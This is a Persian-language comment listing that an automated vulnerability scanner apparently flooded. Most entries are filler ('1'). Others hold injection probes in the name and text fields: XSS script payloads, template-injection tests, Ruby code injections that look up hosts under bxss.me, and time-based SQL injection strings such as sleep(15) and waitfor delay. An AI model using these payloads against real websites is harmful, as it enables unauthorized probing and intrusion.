  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   '"

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   19482571

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   acu5485<s1﹥s2ʺs3ʹuca5485

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   acux9528��z1��z2a�bcxuca9528

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : /xfs.bxss.me در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   <%={{={@{#{${acx}}%>

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : '" در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  • ارسال شده از : 925457 در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   acx{{98991*97996}}xca

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   acx[[${98991*97996}]]xca

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   acx__${98991*97996}__::.x

  • ارسال شده از : http://xfs.bxss.me در تاریخ : 1400/11/24

   1

  • ارسال شده از : //xfs.bxss.me در تاریخ : 1400/11/24

   1

  • ارسال شده از : /\xfs.bxss.me در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   %31%3C%53%63%52%69%50%74%20%3E%52%56%37%6C%289239%29%3C%2F%73%43%72%69%70%54%3E

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1\u003CScRiPt\RV7l(9243)\u003C/sCripT\u003E

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1&lt;ScRiPt&gt;RV7l(9264)&lt;/sCripT&gt;

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1<%div style=width:expression(RV7l(9857))>

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1}body{acu:Expre/**/SSion(RV7l(9701))}

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1<% contenteditable onresize=RV7l(9631)>

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1<7S85JH<

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw9930171 در تاریخ : 1400/11/24

   1

  • ارسال شده از : acu9357<s1﹥s2ʺs3ʹuca9357 در تاریخ : 1400/11/24

   1

  • ارسال شده از : acux10021��z1��z2a�bcxuca10021 در تاریخ : 1400/11/24

   1

  • ارسال شده از : <%={{={@{#{${acx}}%> در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : acx{{98991*97996}}xca در تاریخ : 1400/11/24

   1

  • ارسال شده از : acx[[${98991*97996}]]xca در تاریخ : 1400/11/24

   1

  • ارسال شده از : acx__${98991*97996}__::.x در تاریخ : 1400/11/24

   1

  • ارسال شده از : %4B%66%6E%71%44%75%78%77%3C%53%63%52%69%50%74%20%3E%52%56%37%6C%289637%29%3C%2F%73%43%72%69%70%54%3E در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw\u003CScRiPt\RV7l(9782)\u003C/sCripT\u003E در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw&lt;ScRiPt&gt;RV7l(9374)&lt;/sCripT&gt; در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw<%div style=width:expression(RV7l(9926))> در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw}body{acu:Expre/**/SSion(RV7l(9952))} در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw<% contenteditable onresize=RV7l(9021)> در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   "+"A".concat(70-3).concat(22*4).concat(102).concat(89).concat(111).concat(75)+(require"socket" Socket.gethostbyname("hitja"+"mgcrtweqea387.bxss.me.")[3].to_s)+"

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   '+'A'.concat(70-3).concat(22*4).concat(119).concat(82).concat(97).concat(73)+(require'socket' Socket.gethostbyname('hitgx'+'bikosskk8ea43.bxss.me.')[3].to_s)+'

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : "+"A".concat(70-3).concat(22*4).concat(107).concat(76).concat(101).concat(85)+(require"socket" Socket.gethostbyname("hitoe"+"sutcndnlcefba.bxss.me.")[3].to_s)+" در تاریخ : 1400/11/24

   1

  • ارسال شده از : '+'A'.concat(70-3).concat(22*4).concat(100).concat(75).concat(122).concat(68)+(require'socket' Socket.gethostbyname('hitns'+'gsurynhj96ae2.bxss.me.')[3].to_s)+' در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   "+"A".concat(70-3).concat(22*4).concat(102).concat(89).concat(111).concat(75)+(require"socket" Socket.gethostbyname("hitja"+"mgcrtweqea387.bxss.me.")[3].to_s)+"

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 2+43-43-1=0+0+0+1 -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 3+43-43-1=0+0+0+1 -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 3*2<(0+5+43-43) -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 3*2>(0+5+43-43) -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 2+93-93-1=0+0+0+1 در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 3+93-93-1=0+0+0+1 در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 3*2<(0+5+93-93) در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1 OR 3*2>(0+5+93-93) در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 2+629-629-1=0+0+0+1 -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 3+629-629-1=0+0+0+1 -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 3*2<(0+5+629-629) -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 3*2>(0+5+629-629) -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 2+751-751-1=0+0+0+1 or 'kzl55uFK'=' در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 3+751-751-1=0+0+0+1 or 'kzl55uFK'=' در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 3*2<(0+5+751-751) or 'kzl55uFK'=' در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1' OR 3*2>(0+5+751-751) or 'kzl55uFK'=' در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1" OR 2+622-622-1=0+0+0+1 -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1" OR 3+622-622-1=0+0+0+1 -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1" OR 3*2<(0+5+622-622) -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : -1" OR 3*2>(0+5+622-622) -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : if(now()=sysdate(),sleep(15),0) در تاریخ : 1400/11/24

   1

  • ارسال شده از : 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z در تاریخ : 1400/11/24

   1

  • ارسال شده از : 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z در تاریخ : 1400/11/24

   1

  • ارسال شده از : (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1 waitfor delay '0:0:15' -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : NGctCq7N'; waitfor delay '0:0:15' -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : fVmJpjfO'); waitfor delay '0:0:15' -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : k4X3cIP2')); waitfor delay '0:0:15' -- در تاریخ : 1400/11/24

   1

  • ارسال شده از : 7AbFTteQ' OR 668=(SELECT 668 FROM PG_SLEEP(15))-- در تاریخ : 1400/11/24

   1

  • ارسال شده از : moAj1dh6') OR 603=(SELECT 603 FROM PG_SLEEP(15))-- در تاریخ : 1400/11/24

   1

  • ارسال شده از : HYc6RNWr')) OR 543=(SELECT 543 FROM PG_SLEEP(15))-- در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1'" در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1����%2527%2522 در تاریخ : 1400/11/24

   1

  • ارسال شده از : @@ZGtRb در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1